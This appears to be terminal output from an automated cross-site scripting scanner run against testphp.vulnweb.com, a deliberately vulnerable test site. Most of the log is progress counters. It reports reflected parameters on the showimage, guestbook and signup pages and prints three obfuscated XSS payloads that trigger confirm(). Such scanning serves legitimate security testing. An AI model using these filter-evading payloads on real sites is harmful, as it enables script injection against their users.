[97m[~][0m Progress: 1358/1536 [0m[97m[~][0m Progress: 1359/1536 [0m[97m[~][0m Progress: 1360/1536 [0m[97m[~][0m Progress: 1361/1536 [0m[97m[~][0m Progress: 1362/1536 [0m[97m[~][0m Progress: 1363/1536 [0m[97m[~][0m Progress: 1364/1536 [0m[97m[~][0m Progress: 1365/1536 [0m[97m[~][0m Progress: 1366/1536 [0m[97m[~][0m Progress: 1367/1536 [0m[97m[~][0m Progress: 1368/1536 [0m[97m[~][0m Progress: 1369/1536 [0m[97m[~][0m Progress: 1370/1536 [0m[97m[~][0m Progress: 1371/1536 [0m[97m[~][0m Progress: 1372/1536 [0m[97m[~][0m Progress: 1373/1536 [0m[97m[~][0m Progress: 1374/1536 [0m[97m[~][0m Progress: 1375/1536 [0m[97m[~][0m Progress: 1376/1536 [0m[97m[~][0m Progress: 1377/1536 [0m[97m[~][0m Progress: 1378/1536 [0m[97m[~][0m Progress: 1379/1536 [0m[97m[~][0m Progress: 1380/1536 [0m[97m[~][0m Progress: 1381/1536 [0m[97m[~][0m Progress: 1382/1536 [0m[97m[~][0m Progress: 1383/1536 [0m[97m[~][0m Progress: 1384/1536 [0m[97m[~][0m Progress: 1385/1536 [0m[97m[~][0m Progress: 1386/1536 [0m[97m[~][0m Progress: 1387/1536 [0m[97m[~][0m Progress: 1388/1536 [0m[97m[~][0m Progress: 1389/1536 [0m[97m[~][0m Progress: 1390/1536 [0m[97m[~][0m Progress: 1391/1536 [0m[97m[~][0m Progress: 1392/1536 [0m[97m[~][0m Progress: 1393/1536 [0m[97m[~][0m Progress: 1394/1536 [0m[97m[~][0m Progress: 1395/1536 [0m[97m[~][0m Progress: 1396/1536 [0m[97m[~][0m Progress: 1397/1536 [0m[97m[~][0m Progress: 1398/1536 [0m[97m[~][0m Progress: 1399/1536 [0m[97m[~][0m Progress: 1400/1536 [0m[97m[~][0m Progress: 1401/1536 [0m[97m[~][0m Progress: 1402/1536 [0m[97m[~][0m Progress: 1403/1536 [0m[97m[~][0m Progress: 1404/1536 [0m[97m[~][0m Progress: 1405/1536 [0m[97m[~][0m Progress: 1406/1536 [0m[97m[~][0m Progress: 1407/1536 [0m[97m[~][0m Progress: 1408/1536 [0m[97m[~][0m Progress: 1409/1536 [0m[97m[~][0m Progress: 1410/1536 [0m[97m[~][0m Progress: 1411/1536 [0m[97m[~][0m Progress: 1412/1536 [0m[97m[~][0m Progress: 1413/1536 [0m[97m[~][0m Progress: 1414/1536 [0m[97m[~][0m Progress: 1415/1536 [0m[97m[~][0m Progress: 1416/1536 [0m[97m[~][0m Progress: 1417/1536 [0m[97m[~][0m Progress: 1418/1536 [0m[97m[~][0m Progress: 1419/1536 [0m[97m[~][0m Progress: 1420/1536 [0m[97m[~][0m Progress: 1421/1536 [0m[97m[~][0m Progress: 1422/1536 [0m[97m[~][0m Progress: 1423/1536 [0m[97m[~][0m Progress: 1424/1536 [0m[97m[~][0m Progress: 1425/1536 [0m[97m[~][0m Progress: 1426/1536 [0m[97m[~][0m Progress: 1427/1536 [0m[97m[~][0m Progress: 1428/1536 [0m[97m[~][0m Progress: 1429/1536 [0m[97m[~][0m Progress: 1430/1536 [0m[97m[~][0m Progress: 1431/1536 [0m[97m[~][0m Progress: 1432/1536 [0m[97m[~][0m Progress: 1433/1536 [0m[97m[~][0m Progress: 1434/1536 [0m[97m[~][0m Progress: 1435/1536 [0m[97m[~][0m Progress: 1436/1536 [0m[97m[~][0m Progress: 1437/1536 [0m[97m[~][0m Progress: 1438/1536 [0m[97m[~][0m Progress: 1439/1536 [0m[97m[~][0m Progress: 1440/1536 [0m[97m[~][0m Progress: 1441/1536 [0m[97m[~][0m Progress: 1442/1536 [0m[97m[~][0m Progress: 1443/1536 [0m[97m[~][0m Progress: 1444/1536 [0m[97m[~][0m Progress: 1445/1536 [0m[97m[~][0m Progress: 1446/1536 [0m[97m[~][0m Progress: 1447/1536 [0m[97m[~][0m Progress: 1448/1536 [0m[97m[~][0m Progress: 1449/1536 [0m[97m[~][0m Progress: 1450/1536 [0m[97m[~][0m Progress: 1451/1536 [0m[97m[~][0m Progress: 1452/1536 [0m[97m[~][0m Progress: 1453/1536 [0m[97m[~][0m Progress: 1454/1536 [0m[97m[~][0m Progress: 1455/1536 [0m[97m[~][0m Progress: 1456/1536 [0m[97m[~][0m Progress: 1457/1536 [0m[97m[~][0m Progress: 1458/1536 [0m[97m[~][0m Progress: 1459/1536 [0m[97m[~][0m Progress: 1460/1536 [0m[97m[~][0m Progress: 1461/1536 [0m[97m[~][0m Progress: 1462/1536 [0m[97m[~][0m Progress: 1463/1536 [0m[97m[~][0m Progress: 1464/1536 [0m[97m[~][0m Progress: 1465/1536 [0m[97m[~][0m Progress: 1466/1536 [0m[97m[~][0m Progress: 1467/1536 [0m[97m[~][0m Progress: 1468/1536 [0m[97m[~][0m Progress: 1469/1536 [0m[97m[~][0m Progress: 1470/1536 [0m[97m[~][0m Progress: 1471/1536 [0m[97m[~][0m Progress: 1472/1536 [0m[97m[~][0m Progress: 1473/1536 [0m[97m[~][0m Progress: 1474/1536 [0m[97m[~][0m Progress: 1475/1536 [0m[97m[~][0m Progress: 1476/1536 [0m[97m[~][0m Progress: 1477/1536 [0m[97m[~][0m Progress: 1478/1536 [0m[97m[~][0m Progress: 1479/1536 [0m[97m[~][0m Progress: 1480/1536 [0m[97m[~][0m Progress: 1481/1536 [0m[97m[~][0m Progress: 1482/1536 [0m[97m[~][0m Progress: 1483/1536 [0m[97m[~][0m Progress: 1484/1536 [0m[97m[~][0m Progress: 1485/1536 [0m[97m[~][0m Progress: 1486/1536 [0m[97m[~][0m Progress: 1487/1536 [0m[97m[~][0m Progress: 1488/1536 [0m[97m[~][0m Progress: 1489/1536 [0m[97m[~][0m Progress: 1490/1536 [0m[97m[~][0m Progress: 1491/1536 [0m[97m[~][0m Progress: 1492/1536 [0m[97m[~][0m Progress: 1493/1536 [0m[97m[~][0m Progress: 1494/1536 [0m[97m[~][0m Progress: 1495/1536 [0m[97m[~][0m Progress: 1496/1536 [0m[97m[~][0m Progress: 1497/1536 [0m[97m[~][0m Progress: 1498/1536 [0m[97m[~][0m Progress: 1499/1536 [0m[97m[~][0m Progress: 1500/1536 [0m[97m[~][0m Progress: 1501/1536 [0m[97m[~][0m Progress: 1502/1536 [0m[97m[~][0m Progress: 1503/1536 [0m[97m[~][0m Progress: 1504/1536 [0m[97m[~][0m Progress: 1505/1536 [0m[97m[~][0m Progress: 1506/1536 [0m[97m[~][0m Progress: 1507/1536 [0m[97m[~][0m Progress: 1508/1536 [0m[97m[~][0m Progress: 1509/1536 [0m[97m[~][0m Progress: 1510/1536 [0m[97m[~][0m Progress: 1511/1536 [0m[97m[~][0m Progress: 1512/1536 [0m[97m[~][0m Progress: 1513/1536 [0m[97m[~][0m Progress: 1514/1536 [0m[97m[~][0m Progress: 1515/1536 [0m[97m[~][0m Progress: 1516/1536 [0m[97m[~][0m Progress: 1517/1536 [0m[97m[~][0m Progress: 1518/1536 [0m[97m[~][0m Progress: 1519/1536 [0m[97m[~][0m Progress: 1520/1536 [0m[97m[~][0m Progress: 1521/1536 [0m[97m[~][0m Progress: 1522/1536 [0m[97m[~][0m Progress: 1523/1536 [0m[97m[~][0m Progress: 1524/1536 [0m[97m[~][0m Progress: 1525/1536 [0m[97m[~][0m Progress: 1526/1536 [0m[97m[~][0m Progress: 1527/1536 [0m[97m[~][0m Progress: 1528/1536 [0m[97m[~][0m Progress: 1529/1536 [0m[97m[~][0m Progress: 1530/1536 [0m[97m[~][0m Progress: 1531/1536 [0m[97m[~][0m Progress: 1532/1536 [0m[97m[~][0m Progress: 1533/1536 [0m[97m[~][0m Progress: 1534/1536 [0m[97m[~][0m Progress: 1535/1536 [0m[97m[~][0m Progress: 1536/1536 [0m
[93m[!][0m Testing parameter: artist [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/showimage.php with param: file=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: file [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072 [0m[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <D3v%0doNMOuSEoVer%0d=%0dconfirm()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 100 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/userinfo.php with param: uname=mrt\&None=mrt\&pass=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: uname [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: None [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: pass [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/product.php with param: pic=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: pic [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/cart.php with param: addcart=mrt\&None=mrt\&price=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: addcart [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: None [0m
[91m[-][0m No reflection found [0m
[93m[!][0m Testing parameter: price [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/guestbook.php with param: name=mrt\&submit=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: name [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072 [0m[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <d3v%09onpoIntERentER+=+(confirm)()%0dx>v3dm0s [0m
[93m[!][0m Efficiency: 90 [0m
[93m[!][0m Confidence: 10 [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com/ with param: pp=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: pp [0m
[91m[-][0m No reflection found [0m


-----------------------------------------------------------
start to scan: http://testphp.vulnweb.com//secured/newuser.php with param: uuname=mrt\&upass=mrt\&upass2=mrt\&urname=mrt\&ucc=mrt\&uemail=mrt\&uphone=mrt\&signup=mrt
-----------------------------------------------------------
[97m[~][0m Checking for DOM vulnerabilities [0m
[92m[+][0m WAF Status: [92mOffline[0m [0m
[93m[!][0m Testing parameter: uuname [0m
[93m[!][0m Reflections found: 1 [0m
[97m[~][0m Analysing reflections [0m
[97m[~][0m Generating payloads [0m
[93m[!][0m Payloads generated: 3072 [0m
[97m[~][0m Progress: 1/3072 [0m[91m------------------------------------------------------------[0m
[92m[+][0m Payload: <hTmL/+/oNpoiNTErENTER%09=%09confirm()%0dx// [0m
[93m[!][0m Efficiency: 100 [0m
[93m[!][0m Confidence: 10 [0m
